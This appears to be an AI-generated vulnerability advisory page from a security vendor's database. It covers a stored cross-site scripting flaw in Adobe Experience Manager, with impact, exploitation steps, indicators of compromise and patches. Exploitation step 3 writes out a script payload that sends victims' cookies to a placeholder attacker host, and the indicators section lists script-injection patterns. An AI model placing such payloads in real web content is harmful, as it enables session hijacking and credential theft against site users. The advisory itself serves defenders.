Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2026-75741
Adobe Experience Manager vulnerability analysis and mitigation

Overview

CVE-2026-75741 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. When a victim browses to a page containing the affected field, the injected JavaScript executes in their browser. Affected versions include AEM 6.5 through 6.5.24, AEM 6.5 LTS through SP2, and AEM as a Cloud Service through 2026.7.0. The vulnerability was disclosed and patched on September 8, 2026, with a CVSS v3.1 base score of 5.4 (Medium) (Adobe Advisory, GitHub Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. Insufficient input validation and output encoding in AEM form fields allows attacker-supplied content to be stored server-side and later rendered as executable JavaScript in other users' browsers. Exploitation requires network access, low privileges (an authenticated account), and user interaction (a victim must visit the affected page). The scope change indicator reflects that the injected script executes in the security context of the victim's browser session, crossing the boundary of the vulnerable component (Adobe Advisory, GitHub Advisory).

Impact

Successful exploitation enables an attacker to execute arbitrary JavaScript in the browsers of users who view pages containing the malicious payload, potentially leading to session hijacking, credential theft, phishing, or unauthorized actions performed on behalf of victims. Confidentiality and integrity are both partially impacted, while availability is unaffected. Because the scope is changed, the impact extends beyond the vulnerable AEM component to affect end users' browser sessions and any data accessible within those sessions (Adobe Advisory, GitHub Advisory).

Exploitability

There is no public proof-of-concept exploit and no evidence of in-the-wild exploitation as of the time of disclosure. The EPSS score is approximately 0.27%, placing it in the 20th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and NVD's SSVC assessment classifies exploitation as "none" and the attack as non-automatable (GitHub Advisory, Adobe Advisory).

Exploitation steps

  1. Reconnaissance: Identify an Adobe Experience Manager instance running a vulnerable version (AEM 6.5 ≤ 6.5.24, AEM 6.5 LTS ≤ SP2, or AEM Cloud Service ≤ 2026.7.0) and obtain a low-privileged authenticated account.
  2. Identify vulnerable form field: Navigate to an AEM page or component that contains a form field susceptible to stored XSS — typically a text input or rich-text field that lacks proper output encoding.
  3. Inject malicious payload: Submit a crafted XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save or publish the content.
  4. Wait for victim interaction: The payload is stored server-side. When another user (e.g., an AEM author or site visitor) browses to the page containing the injected field, the malicious script executes in their browser.
  5. Achieve objective: The executed script can exfiltrate session cookies, perform actions on behalf of the victim, redirect to phishing pages, or conduct further attacks within the victim's browser context (Adobe Advisory, GitHub Advisory).

Indicators of compromise

  • Logs: AEM access logs showing POST requests to form submission endpoints containing HTML/JavaScript tags or encoded script sequences (e.g., %3Cscript%3E, javascript:, onerror=) in form field parameters.
  • Logs: AEM audit logs recording content modifications by low-privileged accounts that introduce unexpected <script> tags or event handler attributes into page content.
  • Network: Outbound HTTP requests from victim browsers to unknown external domains shortly after loading AEM-hosted pages, potentially carrying cookie or session data as query parameters.
  • File System / Content Repository: Presence of JavaScript payloads or encoded script content stored within AEM's JCR (Java Content Repository) nodes associated with form fields or editable components.

Mitigation and workarounds

Adobe released patches on September 8, 2026, addressing this vulnerability. Users should upgrade to the following fixed versions: AEM 6.5 to version 6.5.25.0 or later, AEM 6.5 LTS to SP3 or later, and AEM as a Cloud Service to the 2026.8.0 release or later. As interim mitigations, administrators should implement strict input validation and output encoding for all form fields, deploy Content Security Policy (CSP) headers to restrict unauthorized script execution, and limit write access to form fields that are rendered to other users (Adobe Advisory).

Community reactions

The CIS (Center for Internet Security) published an advisory noting multiple vulnerabilities in Adobe products patched in September 2026, including this XSS issue. Tenable released detection plugins (Nessus plugin 344294) for the vulnerability. Coverage was also noted by security aggregators including BeyondMachines and Fortress SRM in their September 2026 threat roundups. No significant researcher commentary or social media discussion specific to this CVE has been identified, consistent with its medium severity and lack of public exploit code.

Additional resources


SourceThis report was generated using AI

Related Adobe Experience Manager vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-79905MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75742MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75741MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75740MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026
CVE-2026-75739MEDIUM5.4
  • Adobe Experience Manager logoAdobe Experience Manager
  • cpe:2.3:a:adobe:experience_manager
NoYesSep 08, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management